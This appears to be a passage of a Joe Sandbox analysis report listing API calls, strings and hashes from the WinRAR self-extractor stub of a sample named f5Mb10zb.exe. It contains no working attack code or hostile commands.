                                                                                      • Part of subcall function 0073AC16: OleInitialize.OLE32(00000000), ref: 0073AC2F
                                                                                      • Part of subcall function 0073AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0073AC66
                                                                                      • Part of subcall function 0073AC16: SHGetMalloc.SHELL32(00768438), ref: 0073AC70
                                                                                    • GetCommandLineW.KERNEL32 ref: 0073DF5C
                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0073DF83
                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0073DF94
                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0073DFCE
                                                                                      • Part of subcall function 0073DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0073DBF4
                                                                                      • Part of subcall function 0073DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0073DC30
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0073DFD7
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe,00000800), ref: 0073DFF2
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe), ref: 0073DFFE
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0073E009
                                                                                    • _swprintf.LIBCMT ref: 0073E048
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0073E05A
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0073E061
                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0073E078
                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0073E0C9
                                                                                    • Sleep.KERNEL32(?), ref: 0073E0F7
                                                                                    • DeleteObject.GDI32 ref: 0073E130
                                                                                    • DeleteObject.GDI32(00050E74), ref: 0073E140
                                                                                    • CloseHandle.KERNEL32 ref: 0073E183
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\RarSFX0$C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzw
                                                                                    • API String ID: 3049964643-2185257127

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6C4
                                                                                      • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6F2
                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6FE
                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A728
                                                                                    • GetLastError.KERNEL32(?,?,?,?,0072A592,000000FF,?,?), ref: 0072A734
                                                                                    Similarity
                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 42610566-0
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002,00000000), ref: 00747E0F
                                                                                    • TerminateProcess.KERNEL32(00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002,00000000), ref: 00747E16
                                                                                    • ExitProcess.KERNEL32 ref: 00747E28
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0073B7E5
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073B8D1
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B8EF
                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0073B902
                                                                                    • TranslateMessage.USER32(?), ref: 0073B910
                                                                                    • DispatchMessageW.USER32(?), ref: 0073B91A
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0073B93D
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0073B960
                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0073B983
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073B99E
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073B9B1
                                                                                      • Part of subcall function 0073D453: _wcschr.LIBVCRUNTIME ref: 0073D45C
                                                                                      • Part of subcall function 0073D453: _wcslen.LIBCMT ref: 0073D47D
                                                                                    • SetFocus.USER32(00000000), ref: 0073B9B8
                                                                                    • _swprintf.LIBCMT ref: 0073BA24
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                      • Part of subcall function 0073D4D4: GetDlgItem.USER32(00000068,0077FCB8), ref: 0073D4E8
                                                                                      • Part of subcall function 0073D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0073AF07,00000001,?,?,0073B7B9,0075506C,0077FCB8,0077FCB8,00001000,00000000,00000000), ref: 0073D510
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073D51B
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073D529
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D53F
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0073D559
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D59D
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0073D5AB
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D5BA
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D5E1
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,007543F4), ref: 0073D5F0
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0073BA68
                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0073BA90
                                                                                    • GetTickCount.KERNEL32 ref: 0073BAAE
                                                                                    • _swprintf.LIBCMT ref: 0073BAC2
                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0073BAF4
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0073BB43
                                                                                    • _swprintf.LIBCMT ref: 0073BB7C
                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0073BBD0
                                                                                    • GetCommandLineW.KERNEL32 ref: 0073BBEA
                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0073BC47
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0073BC6F
                                                                                    • Sleep.KERNEL32(00000064), ref: 0073BCB9
                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0073BCE2
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0073BCEB
                                                                                    • _swprintf.LIBCMT ref: 0073BD1E
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073BD7D
                                                                                    • SetDlgItemTextW.USER32(?,00000065,007535F4), ref: 0073BD94
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0073BD9D
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0073BDAC
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0073BDBB
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073BE68
                                                                                    • _wcslen.LIBCMT ref: 0073BEBE
                                                                                    • _swprintf.LIBCMT ref: 0073BEE8
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0073BF32
                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,00050E74), ref: 0073BF4C
                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0073BF55
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0073BF6B
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0073BF85
                                                                                    • SetWindowTextW.USER32(00000000,0076A472), ref: 0073BFA7
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0073C007
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073C01A
                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0073C0BD
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0073C197
                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0073C1D9
                                                                                      • Part of subcall function 0073C73F: __EH_prolog.LIBCMT ref: 0073C744
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073C1FD
                                                                                    Similarity
                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp\RarSFX0$C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe$LICENSEDLG$PDu<s$STARTDLG$^s$__tmp_rar_sfx_access_check_%u$hs$winrarsfxmappingfile.tmp$Qu
                                                                                    • API String ID: 3829768659-265958362
                                                                                    • Opcode ID: 50e4ab125df4b1a5d3c8b089f49e8b5ff65317a735412f1585aaaf729c8a25ba
                                                                                    • Instruction ID: 0d9ac4ed9b2ee2f1ffaacead047d36450ce664eda37f6f93e760c6712464fb7c
                                                                                    • Opcode Fuzzy Hash: 50e4ab125df4b1a5d3c8b089f49e8b5ff65317a735412f1585aaaf729c8a25ba
                                                                                    • Instruction Fuzzy Hash: E242E4B1940358FAFB229B749C4EFBE3B6CAB01B40F108155F645B60D3DBBC5A448B66

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0073087C
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007308BF
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00730B69
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00730B83
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00730B93
                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<u,00000000), ref: 00730BB1
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00730C09
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00730C1E
                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<u,?,00000000,?,00000800), ref: 00730C72
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<u,00000800,?,00000000,?,00000800), ref: 00730C9C
                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=u,00000800), ref: 00730CD8
                                                                                      • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                      • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                    • _swprintf.LIBCMT ref: 00730D4A
                                                                                    • _swprintf.LIBCMT ref: 00730D96
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • AllocConsole.KERNEL32 ref: 00730D9E
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00730DA8
                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00730DAF
                                                                                    • _wcslen.LIBCMT ref: 00730DC4
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00730DD5
                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00730DDC
                                                                                    • Sleep.KERNEL32(00002710), ref: 00730DE7
                                                                                    • FreeConsole.KERNEL32 ref: 00730DED
                                                                                    • ExitProcess.KERNEL32 ref: 00730DF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                    • String ID: (=u$,<u$,@u$0?u$0Au$4Bu$8>u$D=u$DXGIDebug.dll$H?u$H@u$HAu$P>u$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=u$`@u$d?u$dAu$dwmapi.dll$h=u$h>u$kernel32$uxtheme.dll$|<u$|?u$|@u$<u$>u$?u$@u$Au
                                                                                    • API String ID: 1207345701-1434987480
                                                                                    • Opcode ID: 62b9cfc8fd23f7d095fdd5e9f35b9c716cbce943582b07c91335e25dc5599654
                                                                                    • Instruction ID: 9f8f0f58f41ba286ac0de05155314819ad34727560f3c18d7c68244d78ac29bf
                                                                                    • Opcode Fuzzy Hash: 62b9cfc8fd23f7d095fdd5e9f35b9c716cbce943582b07c91335e25dc5599654
                                                                                    • Instruction Fuzzy Hash: 56D1A6B1008384ABD3219F50C859BDFB7F8BB84746F50492DF989961A1D7FC864CCBA6

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0073C744
                                                                                      • Part of subcall function 0073B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0073B3FB
                                                                                      • Part of subcall function 0073AF98: _wcschr.LIBVCRUNTIME ref: 0073B033
                                                                                    • _wcslen.LIBCMT ref: 0073CA0A
                                                                                    • _wcslen.LIBCMT ref: 0073CA13
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0073CA71
                                                                                    • _wcslen.LIBCMT ref: 0073CAB3
                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0073CBFB
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0073CC36
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0073CC46
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0076A472), ref: 0073CC54
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0073CC7F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                    • String ID: %s.%d.tmp$<br>$<s$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$s
                                                                                    • API String ID: 986293930-1073329622
                                                                                    • Opcode ID: 15423c9eda76cb862de3b56580f74ef1fb0409c84fbfe36a9d4ff2aa8653699e
                                                                                    • Instruction ID: e40e13d8eb6ae6d22bb53e2ebe97b4a4424021efc913dc6c98eca459f6b86cd9
                                                                                    • Opcode Fuzzy Hash: 15423c9eda76cb862de3b56580f74ef1fb0409c84fbfe36a9d4ff2aa8653699e
                                                                                    • Instruction Fuzzy Hash: 15E167B2900218EAEF25DB64DD49EEE73BCAB04350F1080A5F649E7051EB7C9F848F61
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0072DA70
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0072DA91
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0072DAAC
                                                                                      • Part of subcall function 0072C29A: _wcslen.LIBCMT ref: 0072C2A2
                                                                                      • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                      • Part of subcall function 00731B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0072BAE9,00000000,?,?,?,00010486), ref: 00731BA0
                                                                                    • _wcslen.LIBCMT ref: 0072DDE9
                                                                                    • __fprintf_l.LIBCMT ref: 0072DF1C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9u
                                                                                    • API String ID: 557298264-2633427365
                                                                                    • Opcode ID: ff9419c86500eb6af1173b37a9b706e3d8a57c3c729fe51a29683503e04ea166
                                                                                    • Instruction ID: 18da48c45fd7e43d52ab7b3aec034183b8ff0db95df85e477d57db244e8214ef
                                                                                    • Opcode Fuzzy Hash: ff9419c86500eb6af1173b37a9b706e3d8a57c3c729fe51a29683503e04ea166
                                                                                    • Instruction Fuzzy Hash: 6632E171900228DBDF34EF68E845BEE77A5FF04300F50416AF90697291E7B99D85CB90

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0073B73D,00000066), ref: 0073A6D5
                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A6EC
                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A703
                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A712
                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0073B73D,00000066), ref: 0073A72D
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0073A73E
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0073A762
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0073A7C6
                                                                                      • Part of subcall function 0073A626: GdipAlloc.GDIPLUS(00000010), ref: 0073A62C
                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0073A7A7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0073A7CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                    • String ID: Fjuns$PNG
                                                                                    • API String ID: 211097158-78378848
                                                                                    • Opcode ID: d8ae1a963484e62f0f4a2fba6429fa46cdab8108938f25bfd17f7b7788658cad
                                                                                    • Instruction ID: b9790c83e655af9c2992eb7ccce5535d8c2a56567fc3b7ae2ac967aab13bede4
                                                                                    • Opcode Fuzzy Hash: d8ae1a963484e62f0f4a2fba6429fa46cdab8108938f25bfd17f7b7788658cad
                                                                                    • Instruction Fuzzy Hash: AC31C172600B06BFE7119F31DC8DD5BBBB8EF847A1F044518F84682221EB79D8409AA5

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                      • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                      • Part of subcall function 0073B568: IsDialogMessageW.USER32(00010486,?), ref: 0073B59E
                                                                                      • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                      • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                    • GetDlgItem.USER32(00000068,0077FCB8), ref: 0073D4E8
                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0073AF07,00000001,?,?,0073B7B9,0075506C,0077FCB8,0077FCB8,00001000,00000000,00000000), ref: 0073D510
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073D51B
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073D529
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D53F
                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0073D559
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D59D
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0073D5AB
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D5BA
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D5E1
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,007543F4), ref: 0073D5F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Similarity
                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                    • String ID: \
                                                                                    • API String ID: 3569833718-2967466578
                                                                                    • Opcode ID: 01802bda7270e45dcc833d630d823a4a95868bc8fe1fe530722f326c053f7754
                                                                                    • Instruction ID: b9fbe9379c3485a830858ffac9974e65971657f74c6c3bca83318dbd1a8ff926
                                                                                    • Opcode Fuzzy Hash: 01802bda7270e45dcc833d630d823a4a95868bc8fe1fe530722f326c053f7754
                                                                                    • Instruction Fuzzy Hash: 8031F571185741BFE301DF24DC4AFAB7FADEB86B04F104508F551961D1DB688A08877B

                                                                                    Control-flow Graph

